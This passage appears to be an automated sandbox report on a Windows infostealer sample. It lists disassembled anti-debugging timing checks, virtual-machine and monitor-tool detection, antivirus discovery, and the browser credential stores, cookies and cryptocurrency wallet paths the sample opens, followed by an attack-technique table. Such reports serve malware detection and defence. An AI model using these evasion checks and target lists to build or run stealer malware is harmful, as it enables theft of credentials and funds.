                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50903F9 second address: 509041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 5CCFB361h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 509041B second address: 5090457 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2830CF2D2Eh 0x00000008 and ax, 21F8h 0x0000000d jmp 00007F2830CF2D2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2830CF2D36h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50904D0 second address: 50904D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50904D6 second address: 50904DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0661 second address: 50B0698 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2830CEE56Dh 0x00000008 sbb ah, FFFFFFA6h 0x0000000b jmp 00007F2830CEE571h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2830CEE56Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0698 second address: 50B069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B069E second address: 50B06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B06A2 second address: 50B06EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2830CF2D2Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov bh, ah 0x00000016 pushad 0x00000017 mov edx, 67DE51ECh 0x0000001c popad 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2830CF2D38h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B06EE second address: 50B06FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B06FD second address: 50B0702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0702 second address: 50B0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 push esi 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0715 second address: 50B0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F2830CF2D2Eh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0740 second address: 50B0746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0746 second address: 50B07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2830CF2D2Bh 0x0000000f xchg eax, esi 0x00000010 jmp 00007F2830CF2D36h 0x00000015 lea eax, dword ptr [ebp-04h] 0x00000018 pushad 0x00000019 mov cl, 26h 0x0000001b mov cx, dx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F2830CF2D32h 0x00000025 mov dword ptr [esp], eax 0x00000028 jmp 00007F2830CF2D30h 0x0000002d push dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push ebx 0x00000034 pop eax 0x00000035 mov edi, 24E6008Ch 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08DA second address: 50B08DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08DE second address: 50B08E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08E4 second address: 50B08F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CEE56Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08F5 second address: 50B08F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08F9 second address: 50B092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F2830CEE576h 0x00000012 and al, FFFFFFA8h 0x00000015 jmp 00007F2830CEE56Bh 0x0000001a popfd 0x0000001b mov edi, ecx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B092E second address: 50A01A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F2830CF2E8Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F28352BF048h 0x00000027 mov edi, edi 0x00000029 jmp 00007F2830CF2D31h 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01A0 second address: 50A01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 233Ch 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01A9 second address: 50A01C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01C6 second address: 50A01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01CA second address: 50A01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01CE second address: 50A01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01D4 second address: 50A01EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01EE second address: 50A01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01F2 second address: 50A01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01F6 second address: 50A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01FC second address: 50A0240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F2830CF2D2Dh 0x00000013 pushfd 0x00000014 jmp 00007F2830CF2D30h 0x00000019 xor eax, 460BDE48h 0x0000001f jmp 00007F2830CF2D2Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0240 second address: 50A02DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2830CEE56Fh 0x00000009 jmp 00007F2830CEE573h 0x0000000e popfd 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 sub esp, 2Ch 0x00000018 pushad 0x00000019 mov ebx, ecx 0x0000001b pushad 0x0000001c mov dx, ax 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F2830CEE572h 0x00000029 push eax 0x0000002a pushad 0x0000002b mov esi, edx 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 mov ecx, 0F9910BDh 0x0000003a popad 0x0000003b xchg eax, edi 0x0000003c jmp 00007F2830CEE578h 0x00000041 push eax 0x00000042 jmp 00007F2830CEE56Bh 0x00000047 xchg eax, edi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2830CEE575h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A02DD second address: 50A02E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A02E3 second address: 50A02E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0308 second address: 50A030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A030E second address: 50A0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0312 second address: 50A0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e mov eax, 36CB2A1Bh 0x00000013 mov ecx, 5A684CF7h 0x00000018 popad 0x00000019 sub edi, edi 0x0000001b jmp 00007F2830CF2D33h 0x00000020 inc ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F2830CF2D2Bh 0x0000002a add ecx, 4169F62Eh 0x00000030 jmp 00007F2830CF2D39h 0x00000035 popfd 0x00000036 call 00007F2830CF2D30h 0x0000003b pop esi 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0382 second address: 50A03CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2830CEE56Eh 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 pushad 0x00000011 mov ah, FEh 0x00000013 pushfd 0x00000014 jmp 00007F2830CEE56Fh 0x00000019 jmp 00007F2830CEE573h 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007F2830CEE6DCh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A03CF second address: 50A03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A03D3 second address: 50A03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A03EE second address: 50A0439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea ecx, dword ptr [ebp-14h] 0x0000000f pushad 0x00000010 mov ecx, ebx 0x00000012 popad 0x00000013 mov dword ptr [ebp-14h], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ah, 83h 0x0000001b pushfd 0x0000001c jmp 00007F2830CF2D2Fh 0x00000021 xor si, 81BEh 0x00000026 jmp 00007F2830CF2D39h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A049C second address: 50A04A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A04A2 second address: 50A04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Special instruction interceptor: First address: AF8CC4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Special instruction interceptor: First address: AF8C10 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Special instruction interceptor: First address: C9175C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Special instruction interceptor: First address: CA141D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Special instruction interceptor: First address: D19880 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AF9125 rdtsc 0_2_00AF9125
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe TID: 6104 Thread sleep time: -300000s >= -30000s
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe TID: 3288 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: 3LUyRfIoKs.exe, 3LUyRfIoKs.exe, 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: NTICE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: SICE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AF9125 rdtsc 0_2_00AF9125
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00ADE110 LdrInitializeThunk,0_2_00ADE110

                HIPS / PFW / Operating System Protection Evasion

                Source: 3LUyRfIoKs.exe, 3LUyRfIoKs.exe, 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: MProgram Manager
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339617530.0000000001397000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2353177741.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.0000000001397000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: 3LUyRfIoKs.exe PID: 5856, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                Source: 3LUyRfIoKs.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: 3LUyRfIoKs.exe String found in binary or memory: Wallets/Exodus
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                Source: 3LUyRfIoKs.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: 3LUyRfIoKs.exe String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
                Source: Yara match File source: 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: 3LUyRfIoKs.exe PID: 5856, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: 3LUyRfIoKs.exe PID: 5856, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 861 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
